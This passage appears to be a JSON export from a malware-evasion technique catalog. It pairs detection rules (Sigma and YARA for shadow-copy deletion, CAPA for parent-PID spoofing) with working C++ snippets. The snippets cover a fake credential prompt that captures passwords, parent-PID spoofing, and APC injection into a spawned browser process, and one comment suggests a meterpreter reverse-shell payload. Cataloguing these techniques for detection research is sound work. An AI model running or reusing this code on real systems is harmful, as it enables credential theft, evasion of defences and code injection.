                    "rule": "title: Delete Volume Shadow Copies Via WMI With PowerShell\r\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\r\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\r\nreferences:\r\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md\r\n    - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\n    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\ntags:\r\n    - attack.impact\r\n    - attack.t1490\r\nstatus: experimental\r\nauthor: frack113\r\ndate: 2021/06/03\r\nmodified: 2021/10/16\r\nlogsource:\r\n    product: windows\r\n    category: ps_classic_start\r\n    definition: fields have to be extract from event\r\ndetection:\r\n    selection_obj:\r\n        HostApplication|contains|all:\r\n            - 'Get-WmiObject'\r\n            - ' Win32_Shadowcopy'\r\n    selection_del:\r\n        HostApplication|contains:\r\n            - 'Delete()'\r\n            - 'Remove-WmiObject'\r\n    condition: selection_obj and selection_del\r\nfields:\r\n    - HostApplication\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
                },
                {
                    "id": 37,
                    "key": "sigma_proc_creation_win_shadow_copies_deletion",
                    "type": {
                        "id": 3,
                        "name": "SIGMA",
                        "syntax_lang": "yaml"
                    },
                    "name": "SIGMA_proc_creation_win_shadow_copies_deletion",
                    "rule": "title: Shadow Copies Deletion Using Operating Systems Utilities\r\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\r\nstatus: stable\r\ndescription: Shadow Copies deletion using operating systems utilities\r\nauthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\r\ndate: 2019/10/22\r\nmodified: 2021/10/24\r\nreferences:\r\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\r\n    - https://blog.talosintelligence.com/2017/05/wannacry.html\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\r\n    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\r\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\r\n    - https://github.com/Neo23x0/Raccine#the-process\r\n    - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar\r\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\r\ntags:\r\n    - attack.defense_evasion\r\n    - attack.impact\r\n    - attack.t1070\r\n    - attack.t1490\r\nlogsource:\r\n    category: process_creation\r\n    product: windows\r\ndetection:\r\n    selection1:\r\n        Image|endswith:\r\n            - '\\powershell.exe'\r\n            - '\\wmic.exe'\r\n            - '\\vssadmin.exe'\r\n            - '\\diskshadow.exe'\r\n        CommandLine|contains|all:\r\n            - shadow  # will match \"delete shadows\" and \"shadowcopy delete\" and \"shadowstorage\"\r\n            - delete\r\n    selection2:\r\n        Image|endswith:\r\n            - '\\wbadmin.exe'\r\n        CommandLine|contains|all:\r\n            - delete\r\n            - catalog\r\n            - quiet # will match -quiet or /quiet\r\n    selection3:\r\n        Image|endswith: '\\vssadmin.exe'\r\n        CommandLine|contains|all:\r\n            - resize\r\n            - shadowstorage\r\n            - unbounded\r\n    condition: 1 of selection*\r\nfields:\r\n    - CommandLine\r\n    - ParentCommandLine\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
                },
                {
                    "id": 63,
                    "key": "yara_shadow_copy_deletion",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_SHADOW_COPY_DELETION",
                    "rule": "rule shadow_copy_deletion {\r\n    meta:\r\n      description = \"Detect shadow copy deletion\"\r\n      author = \"ditekSHen/Unprotect\"\r\n\r\n    strings:\r\n        $x1 = \"cmd.exe /c \\\"vssadmin.exe Delete Shadows /all /quiet\\\"\" fullword ascii\r\n        $x2 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\r\n        $cmd1 = \"cmd /c \\\"WMIC.exe shadowcopy delet\\\"\" ascii wide nocase\r\n        $cmd2 = \"vssadmin.exe Delete Shadows /all\" ascii wide nocase\r\n        $cmd3 = \"Delete Shadows /all\" ascii wide nocase\r\n        $cmd4 = \"} recoveryenabled no\" ascii wide nocase\r\n        $cmd5 = \"} bootstatuspolicy ignoreallfailures\" ascii wide nocase\r\n        $cmd6 = \"wmic SHADOWCOPY DELETE\" ascii wide nocase\r\n        $cmd7 = \"\\\\Microsoft\\\\Windows\\\\SystemRestore\\\\SR\\\" /disable\" ascii wide nocase\r\n        $cmd8 = \"resize shadowstorage /for=c: /on=c: /maxsize=\" ascii wide nocase\r\n        $cmd9 = \"shadowcopy where \\\"ID='%s'\\\" delete\" ascii wide nocase\r\n        $cmd10 = \"wmic.exe SHADOWCOPY /nointeractive\" ascii wide nocase\r\n        $cmd11 = \"WMIC.exe shadowcopy delete\" ascii wide nocase\r\n        $cmd12 = \"Win32_Shadowcopy | ForEach-Object {$_.Delete();}\" ascii wide nocase\r\n        $delr = /del \\/s \\/f \\/q(( [A-Za-z]:\\\\(\\*\\.|[Bb]ackup))(VHD|bac|bak|wbcat|bkf)?)+/ ascii wide\r\n        $wp1 = \"delete catalog -quiet\" ascii wide nocase\r\n        $wp2 = \"wbadmin delete backup\" ascii wide nocase\r\n        $wp3 = \"delete systemstatebackup\" ascii wide nocase\r\n      \r\n    condition:\r\n        (uint16(0) == 0x5a4d and 2 of ($cmd*) or (1 of ($cmd*) and 1 of ($wp*)) or #delr > 4) or (4 of them)\r\n}"
                }
            ]
        },
        {
            "id": 174,
            "unprotect_id": "U1339",
            "name": "User Interaction (Are you human?)",
            "categories": [
                {
                    "id": 1,
                    "key": "sandbox-evasion",
                    "label": "Sandbox Evasion"
                }
            ],
            "description": "You can get an advantage against sandboxes by using user interaction techniques. For example, The average user has a username and password and as long as the user you are targeting does not enter their password correctly, you can prevent your malware execution and bypass the possible sandbox control.",
            "resources": "https://github.com/hlldz/pickl3",
            "tags": "",
            "snippets": [
                {
                    "id": 70,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 14,
                        "name": "Halil Dalabasmaz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/hlldz",
                        "twitter": "https://twitter.com/hlldz",
                        "website": "artofpwn.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/174/",
                    "description": "",
                    "plain_code": "#include <Windows.h>\r\n#include <tchar.h>\r\n#include <CommCtrl.h>\r\n#include <wincred.h>\r\n#include <iostream>\r\n#include <atlstr.h>\r\n\r\n#pragma comment(lib, \"comctl32.lib\")\r\n#pragma comment(lib, \"Credui.lib\")\r\n\r\nvoid pickl3() {\r\n\r\n\tBOOL loginStatus = FALSE;\r\n\tdo {\r\n\t\tCREDUI_INFOW credui = {};\r\n\t\tcredui.cbSize = sizeof(credui);\r\n\t\tcredui.hwndParent = nullptr;\r\n\t\t//credui.pszMessageText = L\"...\";\r\n\t\tcredui.pszCaptionText = L\"Please verify your Windows user credentials to proceed.\";\r\n\t\tcredui.hbmBanner = nullptr;\r\n\r\n\t\tULONG authPackage = 0;\r\n\t\tLPVOID outCredBuffer = nullptr;\r\n\t\tULONG outCredSize = 0;\r\n\t\tBOOL save = false;\r\n\t\tDWORD err = 0;\r\n\r\n\t\terr = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);\r\n\t\tif (err == ERROR_SUCCESS) {\r\n\t\t\tWCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tDWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;\r\n\t\t\tDWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;\r\n\t\t\tDWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;\r\n\t\t\tCredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);\r\n\r\n\t\t\tWCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tCredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);\r\n\r\n\t\t\tHANDLE handle = nullptr;\r\n\t\t\tloginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);\r\n\r\n\r\n\t\t\tif (loginStatus == TRUE) {\r\n\t\t\t\tCloseHandle(handle);\r\n\t\t\t\tstd::wcout << \"\\n[+] Valid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tstd::wcout << \"\\n[-] Invalid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tloginStatus = FALSE;\r\n\t\t\t}\r\n\t\t}\r\n\t} while (loginStatus == FALSE);\r\n}\r\n\r\n\r\n\r\nint main () {\r\n\t\r\n\tpickl3();\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 173,
            "unprotect_id": "U1234,T1134.004",
            "name": "Parent PID Spoofing",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                },
                {
                    "id": 10,
                    "key": "Defense-Evasion-Mitre",
                    "label": "Defense Evasion [Mitre]"
                }
            ],
            "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. \r\n\r\nOne way of explicitly assigning the PPID of a new process is via the `CreateProcess` API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.\r\n\r\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment. This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.\r\n\r\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.",
            "resources": "https://github.com/hlldz/APC-PPID\r\nhttps://attack.mitre.org/techniques/T1134/004/",
            "tags": "",
            "snippets": [
                {
                    "id": 85,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/173/",
                    "description": "Original Source code: https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
                    "plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nint main() \r\n{\r\n\tSTARTUPINFOEXA si;\r\n\tPROCESS_INFORMATION pi;\r\n\tSIZE_T attributeSize;\r\n\tZeroMemory(&si, sizeof(STARTUPINFOEXA));\r\n\t\r\n\tHANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 6200);\r\n\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);\r\n\tsi.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);\r\n\tInitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);\r\n\tUpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsi.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(NULL, (LPSTR)\"notepad\", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);\r\n\r\n\treturn 0;\r\n}"
                },
                {
                    "id": 69,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 14,
                        "name": "Halil Dalabasmaz",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/hlldz",
                        "twitter": "https://twitter.com/hlldz",
                        "website": "artofpwn.com",
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/173/",
                    "description": "",
                    "plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nDWORD getParentProcessID() {\r\n\tHANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tPROCESSENTRY32 process = { 0 };\r\n\tprocess.dwSize = sizeof(process);\r\n\r\n\tif (Process32First(snapshot, &process)) {\r\n\t\tdo {\r\n            \t\t//If you want to another process as parent change here\r\n\t\t\tif (!wcscmp(process.szExeFile, L\"explorer.exe\"))\r\n\t\t\t\tbreak;\r\n\t\t} while (Process32Next(snapshot, &process));\r\n\t}\r\n\r\n\tCloseHandle(snapshot);\r\n\treturn process.th32ProcessID;\r\n}\r\n\r\nint main() {\r\n\r\n\t//Shellcode, for example; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x EXITFUNC=thread -f c\r\n\tunsigned char shellCode[] = \"\";\r\n\r\n\tSTARTUPINFOEXA sInfoEX;\r\n\tPROCESS_INFORMATION pInfo;\r\n\tSIZE_T sizeT;\r\n\r\n\tHANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());\r\n\r\n\tZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);\r\n\tsInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);\r\n\tInitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);\r\n\tUpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(\"C:\\\\Program Files\\\\internet explorer\\\\iexplore.exe\", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);\r\n\r\n\tLPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tSIZE_T *lpNumberOfBytesWritten = 0;\r\n\tBOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);\r\n\r\n\tQueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);\r\n\tResumeThread(pInfo.hThread);\r\n\tCloseHandle(pInfo.hThread);\r\n\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 88,
                    "key": "capa_check_ppid",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_check_PPID",
                    "rule": "rule:\r\n  meta:\r\n    name: spoof parent PID\r\n    namespace: anti-analysis/anti-forensic\r\n    authors:\r\n      - michael.hunhoff@mandiant.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Access Token Manipulation::Parent PID Spoofing [T1134.004]\r\n    references:\r\n      - https://blog.f-secure.com/detecting-parent-pid-spoofing/\r\n    examples:\r\n      - 2ebadd04f0ada89c36c1409b6e96423a68dd77b513db8db3da203c36d3753e5f:0x140002291\r\n  features:\r\n    - and:\r\n      - api: kernel32.UpdateProcThreadAttribute\r\n      - number: 0x20000 = PROC_THREAD_ATTRIBUTE_PARENT_PROCESS"
                }
            ]
        }
    ]
}